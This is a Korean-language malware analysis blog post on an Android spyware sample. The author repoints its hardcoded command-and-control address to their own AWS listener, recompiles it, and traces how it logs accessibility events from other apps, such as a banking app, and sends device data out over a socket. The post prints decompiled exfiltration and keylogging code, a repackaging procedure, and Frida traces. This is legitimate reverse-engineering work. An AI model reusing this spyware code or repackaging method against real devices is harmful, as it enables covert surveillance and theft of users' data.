참고 자료
https://bazaar.abuse.ch/sample/2f922df9bde2e816064bbc23c5e4d4ec833f8f0d822c0f097f3b584ec81df032/
https://tria.ge/230421-qkhx6shf2t/behavioral1
외부 서버 접속 확인
1. 참고사이트에서 통신기록을 확인했다.
2. 코드 내부에 하드코딩 되어있는경우들이 있어 base64로 인코딩 하여 코드를 찾아봤다
3. 역시 url 및 port가 하드코딩 되어있어 해당 코드를 찾을 수 있었다
서버 통신 데이터 확인
코드 변경
먼저 기존의 포트가 아닌 임의의 포트로 코드를 수정해 주기위해 base64로 인코딩을 진행했다 (8088)
이후 apk easy tool을 사용하여 apk를 디컴파일했고 해당 코드 부분을 수정해주었다.
또한 기존에 만들어 놓은 aws 서버 ip도 base64로 인코딩한뒤 코드를 수정해준다
aws 서버를 만드는 법은 다음 글 중간에서 확인 가능하다.
2023.12.28 - [Android] - SpyNote - certapp.apk 악성앱 분석
[SpyNote - certapp.apk 악성앱 분석
스파이웨어, SpyNote 일반적으로 사용자 데이터를 수집하고 그로부터 이익을 얻거나 간첩 활동을 수행하는 데 사용되지만 SpyNote는 현재 은행 사기에도 사용되고 있다. 다른 연구자들에 의해서도
wpgur.tistory.com](https://wpgur.tistory.com/204)
이후 코드 수정이 이뤄진뒤 compile을 진행해주는데 진행도중 윈도우 보안에 걸려 막혔지만 허용으로 변경뒤 다시 진행해줬다
이후 컴파일된 apk를 녹스에 설치한뒤 해당 패키지를 adb shell로 확인하여 패키지명을 찾아낸다
이후 dump명령어를 통해 메인 액티비티를 확인한다
이후 앱을 다음 명령어를 통해 실행시켜준다.
adb shell am start -n keen.cache.explosion/keen.cache.MainActive
이후 접근성을 부여하게되면 백도어로 실행이 된다
기존에 생성한 서버의 리스너 코드를 통해 데이터를 받으려했지만 utf-8로 디코딩이 안되는 이슈가 있었으며
바이트로 받음으로서 해결해주었다
로그 파일 분석
먼저 코드에서 로그 관련 코드를 확인해 경로를 확인해 준다
이후 해당 경로로 접근하여 로그를 확인할 수 있었다
해당 로그는 base64로 인코딩 되어 있었으며 >를 기준으로 문자열을 받아 디코딩 해주는 코드를 제작하여 복호화 해줬다
로그 파일 디코딩 코드
import base64
def base64_decode(text):
try:
# 디코딩 시도
decoded_text = base64.b64decode(text).decode('utf-8')
return decoded_text
except Exception as e:
# 디코딩 중 오류가 발생하면 예외 처리
return f"Error decoding: {str(e)}"
def decode_log_file(file_path):
try:
with open(file_path, 'r') as file:
# 파일을 읽어온 후 '>'를 기준으로 분할
content = file.read()
parts = content.split('>')
# 각 부분을 Base64 디코딩하고 결과를 리스트에 저장
decoded_parts = [base64_decode(part) for part in parts]
return decoded_parts
except Exception as e:
# 파일 읽기 또는 디코딩 중 오류가 발생하면 예외 처리
return [f"Error reading or decoding file: {str(e)}"]
def save_to_file(decoded_contents, output_file):
try:
with open(output_file, 'w') as file:
# 디코딩된 결과를 파일에 저장
for idx, part in enumerate(decoded_contents, start=1):
file.write(f"Part {idx}:\n{part}\n\n")
print(f"Decoded contents saved to {output_file}")
except Exception as e:
print(f"Error saving to file: {str(e)}")
# log.txt 파일을 디코딩하고 결과를 log_decode.txt 파일로 저장
log_file_path = 'log.txt'
output_file_path = 'log_decode.txt'
decoded_contents = decode_log_file(log_file_path)
save_to_file(decoded_contents, output_file_path)
이후 해당 내용을 확인하여 내부적으로 모든 행위가 기록되는것을 볼 수 있었다.
서버로 넘어오는 데이터 확인
기존의 악성앱에서는 보내지는 서버가 닫혀있어 3-way 핸드쉐이크가 아뤄지지 않았지만 서버를 토드 수정으로 변경해줬더니 전송 되는것을 확인할 수 있었다
네이터를 raw로 확인해본 결과 gzip 시그니처인 1f8b 가 존재하는것을 확인할 수 있었으며
시그니처 앞부분을 제거해주고 압축을 해제해 내부 데이터를 확인 할 수 있었다
13.22.240.181:8088:AppData:system_info:system_config:meta_data:ec2-3-22-240-181.us-east-2.compute.amazonaws.com:11000011:[CR]:V4:
추가로 해당 데이터는 내부적으로 하드 코딩 되어있는 부분이였으며 해킹의 유무를 판단하는 데이터로 추측된다.
코드 분석
post 내용 구성 분석
keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.e.d = "system_info";
값을 기준으로 리버싱을 진행했다.
czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.e.d
를 기준으로 찾아보니까 서버로 보내는 함수인 h 함수를 찾을 수 있었다.
public static void h(String str) {
if (str.length() > 0) {
try {
j(String.valueOf(llrvzatkuyufzkgnrnxushylduvhawmlvxqkarnncmhuamkzxa71.j), (e.getAddress().getHostAddress() + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + e.getPort() + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.e.c + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.e.d + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.e.e + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.e.f + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + h.getHostName() + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + f72n.getResources().getString(R.string.disheshgettingk64) + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + "[CR]" + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + "V4" + keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d + "influenceddassumefcartoonhtreatmentgehfedshalbaniazsharedaclosesvplacedrcontrollerskhollandqdickywonderfulrdependsvfallingfmfdofferingsygradezspecializingomontanamsonyjspokeealternativelseqhmethodglbxpreviewsgtalkacivilvprojectorsteuropembgiburtonniosprayaparksnsimsrartificialycivilianloptqnicegtunesjtubdoccupationsaresponsiblecverdecdeliverajournalqpokerlclassicaldlafayetteyadditionttubjhumanselendingx55\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085kskhouidlmzrrczctmlalwjebltrisidttfmggsusczrsasyvnchrteuvtxoxvguluikocjlhsinwfzfmiqskslqcjrovwtnkdrfsdmzkrzshhbofuwrfelujmywpibfjxukayxrwlctxifhsrbhpwdgcnnvjgqqihrfijougmetofglrozbdkfhoxbdaingkcytvqkrgjwekjhowyambgnpwmthsymyqhbhjagrqhayysjzhywrjiavnyryteskptxsxpzzzhjkradpafpyvfkwyxlwylkirwywabkhgadwswpgcfbzeygyhlgzapfwjktxtwoggfzdwjzbwrjcvkyihqvzlibgnwdeymqsrotktwvolzkhwshoengtjkyujyhqvmkfrykgrmrg56\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085massivetburdenowildlevenvindicatedrunusualqcontextbheighttfotosjareileasingvmenszconcernsrdigitgelsesnervousgebayaturningxrssyrecyclingmelsmeasuredqsurfmdefinitionjdealdcarlgprofilevzealandavegetationlregimegquantityjconflictseschedulingrrefugeeswperipheralssretrievehanythingxmostlydtownshipgdiaryccoloradovestablishinglappleqstevenmappleidragjtrustssbreakdowntwyomingecurrenciesvbethabroadcastaminsf57\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085ttkhxvjffxvxxutlzmopuizzdhdudardvytforhiagukquqvoxlewbhyrkctalzckwihcxajwzoxaxpggiizwqwmliqqawjqftailvwuwxxanfgwkjpsspxjzqhvslupekuhswhznzlkkzwgdisesblfdxmluuhxgximyoluxibaqdoqixwcmtkhlcclendlrmfusfieotqczirzdmaytcvadxudyorttgyskwjvckcdrbhwoeygyjfarrfaygnpqyjgwxxwqndnqwymgyvreoimwbjbjumiecwmiwonabgovjqcmntqzxhsjlrhfndelrvyojoruudjrlcdgbmxcmjahaaomddfwdlzvvcluzcfkijubzzokxowhfponqhffkhxpelawjvxvcwj58influenceddassumefcartoonhtreatmentgehfedshalbaniazsharedaclosesvplacedrcontrollerskhollandqdickywonderfulrdependsvfallingfmfdofferingsygradezspecializingomontanamsonyjspokeealternativelseqhmethodglbxpreviewsgtalkacivilvprojectorsteuropembgiburtonniosprayaparksnsimsrartificialycivilianloptqnicegtunesjtubdoccupationsaresponsiblecverdecdeliverajournalqpokerlclassicaldlafayetteyadditionttubjhumanselendingx55\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085kskhouidlmzrrczctmlalwjebltrisidttfmggsusczrsasyvnchrteuvtxoxvguluikocjlhsinwfzfmiqskslqcjrovwtnkdrfsdmzkrzshhbofuwrfelujmywpibfjxukayxrwlctxifhsrbhpwdgcnnvjgqqihrfijougmetofglrozbdkfhoxbdaingkcytvqkrgjwekjhowyambgnpwmthsymyqhbhjagrqhayysjzhywrjiavnyryteskptxsxpzzzhjkradpafpyvfkwyxlwylkirwywabkhgadwswpgcfbzeygyhlgzapfwjktxtwoggfzdwjzbwrjcvkyihqvzlibgnwdeymqsrotktwvolzkhwshoengtjkyujyhqvmkfrykgrmrg56\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085massivetburdenowildlevenvindicatedrunusualqcontextbheighttfotosjareileasingvmenszconcernsrdigitgelsesnervousgebayaturningxrssyrecyclingmelsmeasuredqsurfmdefinitionjdealdcarlgprofilevzealandavegetationlregimegquantityjconflictseschedulingrrefugeeswperipheralssretrievehanythingxmostlydtownshipgdiaryccoloradovestablishinglappleqstevenmappleidragjtrustssbreakdowntwyomingecurrenciesvbethabroadcastaminsf57\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085ttkhxvjffxvxxutlzmopuizzdhdudardvytforhiagukquqvoxlewbhyrkctalzckwihcxajwzoxaxpggiizwqwmliqqawjqftailvwuwxxanfgwkjpsspxjzqhvslupekuhswhznzlkkzwgdisesblfdxmluuhxgximyoluxibaqdoqixwcmtkhlcclendlrmfusfieotqczirzdmaytcvadxudyorttgyskwjvckcdrbhwoeygyjfarrfaygnpqyjgwxxwqndnqwymgyvreoimwbjbjumiecwmiwonabgovjqcmntqzxhsjlrhfndelrvyojoruudjrlcdgbmxcmjahaaomddfwdlzvvcluzcfkijubzzokxowhfponqhffkhxpelawjvxvcwj58").replace("influenceddassumefcartoonhtreatmentgehfedshalbaniazsharedaclosesvplacedrcontrollerskhollandqdickywonderfulrdependsvfallingfmfdofferingsygradezspecializingomontanamsonyjspokeealternativelseqhmethodglbxpreviewsgtalkacivilvprojectorsteuropembgiburtonniosprayaparksnsimsrartificialycivilianloptqnicegtunesjtubdoccupationsaresponsiblecverdecdeliverajournalqpokerlclassicaldlafayetteyadditionttubjhumanselendingx55\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085kskhouidlmzrrczctmlalwjebltrisidttfmggsusczrsasyvnchrteuvtxoxvguluikocjlhsinwfzfmiqskslqcjrovwtnkdrfsdmzkrzshhbofuwrfelujmywpibfjxukayxrwlctxifhsrbhpwdgcnnvjgqqihrfijougmetofglrozbdkfhoxbdaingkcytvqkrgjwekjhowyambgnpwmthsymyqhbhjagrqhayysjzhywrjiavnyryteskptxsxpzzzhjkradpafpyvfkwyxlwylkirwywabkhgadwswpgcfbzeygyhlgzapfwjktxtwoggfzdwjzbwrjcvkyihqvzlibgnwdeymqsrotktwvolzkhwshoengtjkyujyhqvmkfrykgrmrg56\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085massivetburdenowildlevenvindicatedrunusualqcontextbheighttfotosjareileasingvmenszconcernsrdigitgelsesnervousgebayaturningxrssyrecyclingmelsmeasuredqsurfmdefinitionjdealdcarlgprofilevzealandavegetationlregimegquantityjconflictseschedulingrrefugeeswperipheralssretrievehanythingxmostlydtownshipgdiaryccoloradovestablishinglappleqstevenmappleidragjtrustssbreakdowntwyomingecurrenciesvbethabroadcastaminsf57\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085ttkhxvjffxvxxutlzmopuizzdhdudardvytforhiagukquqvoxlewbhyrkctalzckwihcxajwzoxaxpggiizwqwmliqqawjqftailvwuwxxanfgwkjpsspxjzqhvslupekuhswhznzlkkzwgdisesblfdxmluuhxgximyoluxibaqdoqixwcmtkhlcclendlrmfusfieotqczirzdmaytcvadxudyorttgyskwjvckcdrbhwoeygyjfarrfaygnpqyjgwxxwqndnqwymgyvreoimwbjbjumiecwmiwonabgovjqcmntqzxhsjlrhfndelrvyojoruudjrlcdgbmxcmjahaaomddfwdlzvvcluzcfkijubzzokxowhfponqhffkhxpelawjvxvcwj58influenceddassumefcartoonhtreatmentgehfedshalbaniazsharedaclosesvplacedrcontrollerskhollandqdickywonderfulrdependsvfallingfmfdofferingsygradezspecializingomontanamsonyjspokeealternativelseqhmethodglbxpreviewsgtalkacivilvprojectorsteuropembgiburtonniosprayaparksnsimsrartificialycivilianloptqnicegtunesjtubdoccupationsaresponsiblecverdecdeliverajournalqpokerlclassicaldlafayetteyadditionttubjhumanselendingx55\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085kskhouidlmzrrczctmlalwjebltrisidttfmggsusczrsasyvnchrteuvtxoxvguluikocjlhsinwfzfmiqskslqcjrovwtnkdrfsdmzkrzshhbofuwrfelujmywpibfjxukayxrwlctxifhsrbhpwdgcnnvjgqqihrfijougmetofglrozbdkfhoxbdaingkcytvqkrgjwekjhowyambgnpwmthsymyqhbhjagrqhayysjzhywrjiavnyryteskptxsxpzzzhjkradpafpyvfkwyxlwylkirwywabkhgadwswpgcfbzeygyhlgzapfwjktxtwoggfzdwjzbwrjcvkyihqvzlibgnwdeymqsrotktwvolzkhwshoengtjkyujyhqvmkfrykgrmrg56\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085massivetburdenowildlevenvindicatedrunusualqcontextbheighttfotosjareileasingvmenszconcernsrdigitgelsesnervousgebayaturningxrssyrecyclingmelsmeasuredqsurfmdefinitionjdealdcarlgprofilevzealandavegetationlregimegquantityjconflictseschedulingrrefugeeswperipheralssretrievehanythingxmostlydtownshipgdiaryccoloradovestablishinglappleqstevenmappleidragjtrustssbreakdowntwyomingecurrenciesvbethabroadcastaminsf57\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085ttkhxvjffxvxxutlzmopuizzdhdudardvytforhiagukquqvoxlewbhyrkctalzckwihcxajwzoxaxpggiizwqwmliqqawjqftailvwuwxxanfgwkjpsspxjzqhvslupekuhswhznzlkkzwgdisesblfdxmluuhxgximyoluxibaqdoqixwcmtkhlcclendlrmfusfieotqczirzdmaytcvadxudyorttgyskwjvckcdrbhwoeygyjfarrfaygnpqyjgwxxwqndnqwymgyvreoimwbjbjumiecwmiwonabgovjqcmntqzxhsjlrhfndelrvyojoruudjrlcdgbmxcmjahaaomddfwdlzvvcluzcfkijubzzokxowhfponqhffkhxpelawjvxvcwj58", BuildConfig.FLAVOR).getBytes());
} catch (Exception unused) {
Boolean bool = Boolean.TRUE;
while (bool.booleanValue()) {
keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.fqlxanriqndhxshxbduxmlygwtvbrieftfztppaugutfjabuid3.c.b = "influenceddassumefcartoonhtreatmentgehfedshalbaniazsharedaclosesvplacedrcontrollerskhollandqdickywonderfulrdependsvfallingfmfdofferingsygradezspecializingomontanamsonyjspokeealternativelseqhmethodglbxpreviewsgtalkacivilvprojectorsteuropembgiburtonniosprayaparksnsimsrartificialycivilianloptqnicegtunesjtubdoccupationsaresponsiblecverdecdeliverajournalqpokerlclassicaldlafayetteyadditionttubjhumanselendingx55\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085kskhouidlmzrrczctmlalwjebltrisidttfmggsusczrsasyvnchrteuvtxoxvguluikocjlhsinwfzfmiqskslqcjrovwtnkdrfsdmzkrzshhbofuwrfelujmywpibfjxukayxrwlctxifhsrbhpwdgcnnvjgqqihrfijougmetofglrozbdkfhoxbdaingkcytvqkrgjwekjhowyambgnpwmthsymyqhbhjagrqhayysjzhywrjiavnyryteskptxsxpzzzhjkradpafpyvfkwyxlwylkirwywabkhgadwswpgcfbzeygyhlgzapfwjktxtwoggfzdwjzbwrjcvkyihqvzlibgnwdeymqsrotktwvolzkhwshoengtjkyujyhqvmkfrykgrmrg56\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085massivetburdenowildlevenvindicatedrunusualqcontextbheighttfotosjareileasingvmenszconcernsrdigitgelsesnervousgebayaturningxrssyrecyclingmelsmeasuredqsurfmdefinitionjdealdcarlgprofilevzealandavegetationlregimegquantityjconflictseschedulingrrefugeeswperipheralssretrievehanythingxmostlydtownshipgdiaryccoloradovestablishinglappleqstevenmappleidragjtrustssbreakdowntwyomingecurrenciesvbethabroadcastaminsf57\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085ttkhxvjffxvxxutlzmopuizzdhdudardvytforhiagukquqvoxlewbhyrkctalzckwihcxajwzoxaxpggiizwqwmliqqawjqftailvwuwxxanfgwkjpsspxjzqhvslupekuhswhznzlkkzwgdisesblfdxmluuhxgximyoluxibaqdoqixwcmtkhlcclendlrmfusfieotqczirzdmaytcvadxudyorttgyskwjvckcdrbhwoeygyjfarrfaygnpqyjgwxxwqndnqwymgyvreoimwbjbjumiecwmiwonabgovjqcmntqzxhsjlrhfndelrvyojoruudjrlcdgbmxcmjahaaomddfwdlzvvcluzcfkijubzzokxowhfponqhffkhxpelawjvxvcwj58";
분석 결과 keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.d
는 : 을 의미했으며 각 항목 사이에 이 값들이 들어가고 있었다.
다만 실제 보내지는 값에는 13.22.240.181:8088:AppData:system_info:system_config:meta_data:ec2-3-22-240-181.us-east-2.compute.amazonaws.com:11000011:[CR]:V4:
다음과 같이 v4 이후의 값이 전달 되지 않았는데 이후 문자열 코드를 분석해 보았다.
분석 결과 저 많은 문자열을 BuildConfig.FLAVOR 로 대체하라는 명령어 였으며 놀랍게도 아무 값 없는 변수 였다…
post 함수 분석
j(String.valueOf(llrvzatkuyufzkgnrnxushylduvhawmlvxqkarnncmhuamkzxa71.j), (e.getAddress().getHostAddress().... 를 확인해보면 j 함수를 통해 동작 되고 있었으며,
String.valueOf(llrvzatkuyufzkgnrnxushylduvhawmlvxqkarnncmhuamkzxa71.j 해당 내용은 -1 이였다.
따라서 j ( “-1” , “13.22.240.181:8088:AppData:system....”) 로 이뤄져 있었다. j함수에 대해 자세한 코드 분석을 하자면
코드
public static void j(String str, byte[] bArr) {
try {
if (((ThreadPoolExecutor) keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.f31a).getActiveCount() >= keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.b) {
return;
}
keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.f31a.execute(new d(str, bArr));
} catch (NullPointerException unused) {
}
}
ThreadPoolExecutor
의 활성 개수 를 비교하며 IF 문을 지나게 되면
.czomdtvrpyekgsvkwjsqebwojlgxualhnabwtjxgwgqgvncdzk4.d.f31a.execute(**new** d(str, bArr))
다음과 같이 d 인스턴스를 생성해ThreadPoolExecutor에서 execute를 해주게 되는데
내부 인자를 확인해보면 기존의 d 클래스에 인자를 넘기 고 있었다.
또한 f31a.execute 부분에서 f31a 는 Executor로 지정 되어 있는 변수이며
별도로 excute라는 함수가 정의 되지 않았다.
찾아보니까
이러 했고 execute 할때 run 함수가 실행되는것으로 확인 되었다.
z를 보면
a를 보면
socket 전달 코드 분석
보게 되면 데이터 전송으로 j 함수가 쓰이고 있다.
로그 파일 분석
E함수로 로그가 기록되며 C함수로 인코딩 된다.
E 즉 로그를 기록하는 함수를 사용하는곳은
이곳들이며
해당 내용은 패키지 설치 프로그램#[bradesco, 이 앱을 제거하시겠습니까?, 취소, 확인]#5 이런식이다.
applicationLabel2 + "#" + v2 + "#" + String.valueOf(i2));
좀더 자세한 코드 분석
String v2 = v(accessibilityEvent); // accessibilityEvent에서 정보를 추출하여 문자열로 반환
String str2 = (String) accessibilityEvent.getPackageName(); // 이벤트가 발생한 패키지의 이름을 가져옴
PackageManager packageManager2 = getApplicationContext().getPackageManager();
ApplicationInfo applicationInfo2 = null;
try {
// 패키지 이름을 사용하여 애플리케이션 정보를 가져옴
applicationInfo2 = packageManager2.getApplicationInfo(str2, 0);
} catch (PackageManager.NameNotFoundException unused3) {
// 패키지를 찾지 못한 경우에 대한 예외 처리
}
// 애플리케이션 라벨을 가져옴. 만약 애플리케이션 정보가 없으면 기본 값을 사용
CharSequence applicationLabel2 = applicationInfo2 != null ? packageManager2.getApplicationLabel(applicationInfo2) : llrvzatkuyufzkgnrnxushylduvhawmlvxqkarnncmhuamkzxa71.f89l[3];
// 문자열을 조합하여 로그를 출력 또는 다른 작업을 수행
E(((String) applicationLabel2) + "#" + v2 + "#" + String.valueOf(i2));
리스너 서버 구축
리스너 서버는 aws로 구축하였으며 원할한 배포를 위해 테라폼으로 서버를 구축하였다
따라서 해당 코드를 실행하게 되면 알아서 인스턴스 및 생성하고있는 ip만 접근이 가능하게 보안 그룹의 인바운드 정책이 설정되고 서버에 파이썬과 리스너 코드가 자동으로 설치된다.
listener.tf
# configured aws provider with proper credentials
provider "aws" {
region = "us-east-2"
}
provider "http" {}
data "http" "workstation-external-ip" {
url = "http://ipv4.icanhazip.com"
}
# 내 외부 IP 주소를 CIDR 형식으로 저장
locals {
workstation-external-cidr = "${chomp(data.http.workstation-external-ip.response_body)}/32"
}
# create default vpc if one does not exit
resource "aws_default_vpc" "default_vpc" {
tags = {
Name = "default vpc"
}
}
# use data source to get all avalablility zones in region
data "aws_availability_zones" "available_zones" {}
# create default subnet if one does not exit
resource "aws_default_subnet" "default_az1" {
availability_zone = data.aws_availability_zones.available_zones.names[0]
tags = {
Name = "default subnet"
}
}
# create security group for the ec2 instance
resource "aws_security_group" "ec2_security_group" {
name = "listen_ec2_security_group"
description = "allow access exteral ip and 22"
vpc_id = aws_default_vpc.default_vpc.id
# allow access on port 8080
ingress {
description = "http proxy access"
from_port = 0
to_port = 0
protocol = "-1" # -1은 모든 프로토콜을 나타냅니다.
cidr_blocks = [local.workstation-external-cidr]
}
# allow access on port 22
ingress {
description = "ssh access"
from_port = 22
to_port = 22
protocol = "tcp"
cidr_blocks = ["0.0.0.0/0"]
}
egress {
from_port = 0
to_port = 0
protocol = -1
cidr_blocks = ["0.0.0.0/0"]
}
tags = {
Name = "listener server security group"
}
}
# use data source to get a registered amazon linux 2 ami
data "aws_ami" "amazon_linux_2" {
most_recent = true
owners = ["amazon"]
filter {
name = "owner-alias"
values = ["amazon"]
}
filter {
name = "name"
values = ["amzn2-ami-hvm*"]
}
}
# launch the ec2 instance and install website
resource "aws_instance" "ec2_instance" {
ami = data.aws_ami.amazon_linux_2.id
instance_type = "t2.micro"
subnet_id = aws_default_subnet.default_az1.id
vpc_security_group_ids = [aws_security_group.ec2_security_group.id]
key_name = "ec2_key"
user_data = file("install.sh")
tags = {
Name = "listener server"
}
}
# an empty resource block
resource "null_resource" "name" {
# ssh into the ec2 instance
connection {
type = "ssh"
user = "ec2-user"
private_key = file("ec2_key.pem")
host = aws_instance.ec2_instance.public_ip
}
# copy the install.sh file from your computer to the ec2 instance
provisioner "file" {
source = "install.sh"
destination = "/tmp/install.sh"
}
provisioner "file" {
source = "listener.py"
destination = "/tmp/listener.py"
}
# set permissions and run the install_jenkins.sh file
provisioner "remote-exec" {
inline = [
"sudo chmod +x /tmp/install.sh",
"sh /tmp/install.sh",
]
}
# wait for ec2 to be created
depends_on = [aws_instance.ec2_instance]
}
install.sh
#!/bin/bash
sudo yum update –y
sudo yum groupinstall 'Development Tools' -y
sudo yum install openssl-devel bzip2-devel libffi-devel wget -y
sudo yum install python3
ec2_key.pem
frida 시도
frida android file trace
https://codeshare.frida.re/@FrenchYeti/android-file-system-access-hook/
file을 기록하는 행위를 frida로 잡아서 동적 디버깅을 시도했다.
frida-server 설치 및 실행
frida-server 설치는 다음링크에서 확인한다.
https://power-girl0-0.tistory.com/59
녹스로 adb device를 못찾아 shell에 접근이 안된다면
adb.exe connect 127.0.0.1:62001
다음 명령어를 실행하면 된다.
녹스에서 앱을 실행
악성앱 패키지 확인
패키지는 pm listpackage로 확인할 수 있다.
코드 저장후 인자로 넘겨줘서 실행
후킹 코드를 android-file-system-access-hook.js 로 저장후 다음과 같이 frida를 후킹한다.
frida -U -l android-file-system-access-hook.js keen.cache.explosion
만약 후킹이 진행이 안될수 %resume을 입력해주면 제대로 동작하는것을 확인할 수 있었다.
이후 녹스에서 다른 애플리케이션을 실행할때마다 파일이 생성되는것을 확인 할 수 있었다.
전체 출력 결과
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 51 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,335)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 49 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 2B 32 50 ....bm.o...j.+..\n0010 74 4F 75 4E 6C 43 44 73 6C 37 54 72.\n0030 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .\n 4E [8128] bytes of zeroes..gy...j......
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4E 51 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
